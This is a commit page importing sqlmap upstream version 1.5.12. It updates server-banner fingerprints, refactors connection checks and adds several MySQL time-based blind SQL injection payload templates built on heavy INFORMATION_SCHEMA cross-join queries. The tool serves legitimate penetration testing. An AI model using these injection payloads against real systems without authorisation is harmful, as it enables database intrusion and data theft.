Commit f5a1c63e authored by Nong Hoang Tu's avatar Nong Hoang Tu
Browse files

New upstream version 1.5.12

parent 61bc4d75
Pipeline #4782 failed with stages
GPL Cooperation Commitment
Version 1.0
Before filing or continuing to prosecute any legal proceeding or claim
(other than a Defensive Action) arising from termination of a Covered
License, we commit to extend to the person or entity ('you') accused
of violating the Covered License the following provisions regarding
cure and reinstatement, taken from GPL version 3. As used here, the
term 'this License' refers to the specific Covered License being
enforced.
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly
and finally terminates your license, and (b) permanently, if the
copyright holder fails to notify you of the violation by some
reasonable means prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you
have received notice of violation of this License (for any work)
from that copyright holder, and you cure the violation prior to 30
days after your receipt of the notice.
We intend this Commitment to be irrevocable, and binding and
enforceable against us and assignees of or successors to our
copyrights.
Definitions
'Covered License' means the GNU General Public License, version 2
(GPLv2), the GNU Lesser General Public License, version 2.1
(LGPLv2.1), or the GNU Library General Public License, version 2
(LGPLv2), all as published by the Free Software Foundation.
'Defensive Action' means a legal proceeding or claim that We bring
against you in response to a prior proceeding or claim initiated by
you or your affiliate.
'We' means each contributor to this repository as of the date of
inclusion of this file, including subsidiaries of a corporate
contributor.
This work is available under a Creative Commons Attribution-ShareAlike
4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/).
File suppressed by a .gitattributes entry or the file's encoding is unsupported.
......@@ -34,7 +34,7 @@
<!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
<regexp value="Windows.*\b10\.0">
<info type="Windows" distrib="2019|2016|10"/>
<info type="Windows" distrib="2016|2019|10|11"/>
</regexp>
<regexp value="Windows.*\b6\.3">
......
......@@ -163,6 +163,10 @@
<info type="Linux" distrib="Debian" release="10" codename="buster"/>
</regexp>
<regexp value="Apache/2\.4\.48 \(Debian\)">
<info type="Linux" distrib="Debian" release="11" codename="bullseye"/>
</regexp>
<!-- Apache: Fedora -->
<regexp value="Apache/2\.0\.47 \(Fedora\)">
......@@ -315,7 +319,11 @@
</regexp>
<regexp value="Apache/2\.4\.46 \(Fedora\)">
<info type="Linux" distrib="Fedora" release="33"/>
<info type="Linux" distrib="Fedora" release="33|34"/>
</regexp>
<regexp value="Apache/2\.4\.51 \(Fedora\)">
<info type="Linux" distrib="Fedora" release="35"/>
</regexp>
<!-- Apache: FreeBSD -->
......@@ -858,7 +866,7 @@
</regexp>
<regexp value="Apache/2\.4\.41 \(Ubuntu\)">
<info type="Linux" distrib="Ubuntu" release="19.10|20.04" codename="eoan|focal"/>
<info type="Linux" distrib="Ubuntu" release="19.10|20.04|20.10" codename="eoan|focal"/>
</regexp>
<!-- Nginx -->
......
......@@ -85,7 +85,7 @@
</test>
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
<title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK - comment)</title>
<stype>4</stype>
<level>3</level>
<risk>2</risk>
......@@ -105,7 +105,7 @@
</test>
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
<title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK)</title>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
......@@ -486,7 +486,7 @@
<test>
<title>IBM DB2 stacked queries (heavy query - comment)</title>
<stype>5</stype>
<stype>4</stype>
<level>3</level>
<risk>2</risk>
<clause>1-8</clause>
......@@ -506,7 +506,7 @@
<test>
<title>IBM DB2 stacked queries (heavy query)</title>
<stype>5</stype>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
......@@ -607,7 +607,7 @@
<test>
<title>SAP MaxDB stacked queries (heavy query - comment)</title>
<stype>5</stype>
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>1-8</clause>
......@@ -627,7 +627,7 @@
<test>
<title>SAP MaxDB stacked queries (heavy query)</title>
<stype>5</stype>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
......
......@@ -169,7 +169,7 @@
</test>
<test>
<title>MySQL &lt; 5.0.12 AND time-based blind (heavy query)</title>
<title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
......@@ -189,7 +189,27 @@
</test>
<test>
<title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
<title>MySQL &gt; 5.0.12 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK)</title>
<stype>5</stype>
<level>2</level>
<risk>3</risk>
......@@ -209,7 +229,27 @@
</test>
<test>
<title>MySQL &lt; 5.0.12 AND time-based blind (heavy query - comment)</title>
<title>MySQL &gt; 5.0.12 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
......@@ -230,7 +270,28 @@
</test>
<test>
<title>MySQL &lt; 5.0.12 OR time-based blind (heavy query - comment)</title>
<title>MySQL &gt; 5.0.12 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
<comment>#</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>3</risk>
......@@ -250,6 +311,27 @@
</details>
</test>
<test>
<title>MySQL &gt; 5.0.12 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
<comment>#</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title>
<stype>5</stype>
......@@ -1500,7 +1582,7 @@
</test>
<test>
<title>MySQL &lt; 5.0.12 time-based blind - Parameter replace (heavy queries)</title>
<title>MySQL &lt; 5.0.12 time-based blind - Parameter replace (BENCHMARK)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
......@@ -1519,6 +1601,26 @@
</details>
</test>
<test>
<title>MySQL &gt; 5.0.12 time-based blind - Parameter replace (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL time-based blind - Parameter replace (bool)</title>
<stype>5</stype>
......@@ -1854,7 +1956,7 @@
</test>
<test>
<title>MySQL &lt; 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
<title>MySQL &lt; 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
......
# Version 1.5 (2021-01-03)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5)
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1)
# Version 1.4 (2020-01-01)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4)
......
......@@ -509,7 +509,7 @@ def checkSqlInjection(place, parameter, value):
falseRawResponse = "%s%s" % (falseHeaders, falsePage)
# Checking if there is difference between current FALSE, original and heuristics page (i.e. not used parameter)
if not any((kb.negativeLogic, conf.string, conf.notString)):
if not any((kb.negativeLogic, conf.string, conf.notString, conf.code)):
try:
ratio = 1.0
seqMatcher = getCurrentThreadData().seqMatcher
......@@ -1340,44 +1340,6 @@ def checkStability():
return kb.pageStable
def checkString():
if not conf.string:
return True
infoMsg = "testing if the provided string is within the "
infoMsg += "target URL page content"
logger.info(infoMsg)
page, headers, _ = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if conf.string not in rawResponse:
warnMsg = "you provided '%s' as the string to " % conf.string
warnMsg += "match, but such a string is not within the target "
warnMsg += "URL raw response, sqlmap will carry on anyway"
logger.warn(warnMsg)
return True
def checkRegexp():
if not conf.regexp:
return True
infoMsg = "testing if the provided regular expression matches within "
infoMsg += "the target URL page content"
logger.info(infoMsg)
page, headers, _ = Request.queryPage(content=True)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if not re.search(conf.regexp, rawResponse, re.I | re.M):
warnMsg = "you provided '%s' as the regular expression " % conf.regexp
warnMsg += "which does not have any match within the target URL raw response. sqlmap "
warnMsg += "will carry on anyway"
logger.warn(warnMsg)
return True
@stackedmethod
def checkWaf():
"""
......@@ -1542,7 +1504,31 @@ def checkConnection(suppressOutput=False):
try:
kb.originalPageTime = time.time()
Request.queryPage(content=True, noteResponseTime=False)
page, headers, _ = Request.queryPage(content=True, noteResponseTime=False)
rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
if conf.string:
infoMsg = "testing if the provided string is within the "
infoMsg += "target URL page content"
logger.info(infoMsg)
if conf.string not in rawResponse:
warnMsg = "you provided '%s' as the string to " % conf.string
warnMsg += "match, but such a string is not within the target "
warnMsg += "URL raw response, sqlmap will carry on anyway"
logger.warn(warnMsg)
if conf.regexp:
infoMsg = "testing if the provided regular expression matches within "
infoMsg += "the target URL page content"
logger.info(infoMsg)
if not re.search(conf.regexp, rawResponse, re.I | re.M):
warnMsg = "you provided '%s' as the regular expression " % conf.regexp
warnMsg += "which does not have any match within the target URL raw response. sqlmap "
warnMsg += "will carry on anyway"
logger.warn(warnMsg)
kb.errorIsNone = False
......
......@@ -16,10 +16,8 @@ from lib.controller.checks import checkConnection
from lib.controller.checks import checkDynParam
from lib.controller.checks import checkInternet
from lib.controller.checks import checkNullConnection
from lib.controller.checks import checkRegexp
from lib.controller.checks import checkSqlInjection
from lib.controller.checks import checkStability
from lib.controller.checks import checkString
from lib.controller.checks import checkWaf
from lib.controller.checks import heuristicCheckSqlInjection
from lib.core.agent import agent
......@@ -434,7 +432,7 @@ def start():
setupTargetEnv()
if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
if not checkConnection(suppressOutput=conf.forms):
continue
if conf.rParam and kb.originalPage:
......
......@@ -1028,10 +1028,12 @@ def dataToStdout(data, forceOutput=False, bold=False, contentType=None, status=C
sys.stdout.write(stdoutEncode(clearColors(data)), status, contentType)
else:
sys.stdout.write(stdoutEncode(setColor(data, bold=bold) if coloring else clearColors(data)))
sys.stdout.flush()
except IOError:
pass
except UnicodeEncodeError:
sys.stdout.write(re.sub(r"[^ -~]", '?', clearColors(data)))
finally:
sys.stdout.flush()
if multiThreadMode:
logging._releaseLock()
......
......@@ -2655,6 +2655,15 @@ def _basicOptionValidation():
errMsg = "invalid regular expression '%s' ('%s')" % (conf.retryOn, getSafeExString(ex))
raise SqlmapSyntaxException(errMsg)
if conf.retries == defaults.retries:
conf.retries = 5 * conf.retries
warnMsg = "increasing default value for "
warnMsg += "option '--retries' to %d because " % conf.retries
warnMsg += "option '--retry-on' was provided"
logger.warn(warnMsg)
if conf.cookieDel and len(conf.cookieDel):
errMsg = "option '--cookie-del' should contain a single character (e.g. ';')"
raise SqlmapSyntaxException(errMsg)
......
......@@ -20,7 +20,7 @@ from thirdparty import six
from thirdparty.six import unichr as _unichr
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.5.11.0"
VERSION = "1.5.12.0"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
......
......@@ -914,11 +914,6 @@ class Connect(object):
warnMsg = "forced retry of the request because of undesired page content"
logger.warn(warnMsg)
return Connect._retryProxy(**kwargs)
else:
errMsg = "unable to get the page content not matching "
errMsg += "the given regular expression '%s'. Please use as high " % conf.retryOn
errMsg += "value for option '--retries' as possible (e.g. 20 or more)"
raise SqlmapConnectionException(errMsg)
processResponse(page, responseHeaders, code, status)
......
......@@ -161,7 +161,7 @@ timeout = 30
retries = 3
# Retry request on regexp matching content.
retries = 3
retryOn =
# Randomly change value for the given parameter.
rParam =
......
......@@ -349,6 +349,13 @@ def main():
logger.critical(errMsg)
raise SystemExit
elif "hash_randomization" in excMsg:
errMsg = "error occurred at Python interpreter which "
errMsg += "is fixed in 2.7.3. Please update accordingly "
errMsg += "(Reference: 'https://docs.python.org/2/library/sys.html')"
logger.critical(errMsg)
raise SystemExit
elif all(_ in excMsg for _ in ("Resource temporarily unavailable", "os.fork()", "dictionaryAttack")):
errMsg = "there has been a problem while running the multiprocessing hash cracking. "
errMsg += "Please rerun with option '--threads=1'"
......
Supports Markdown
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment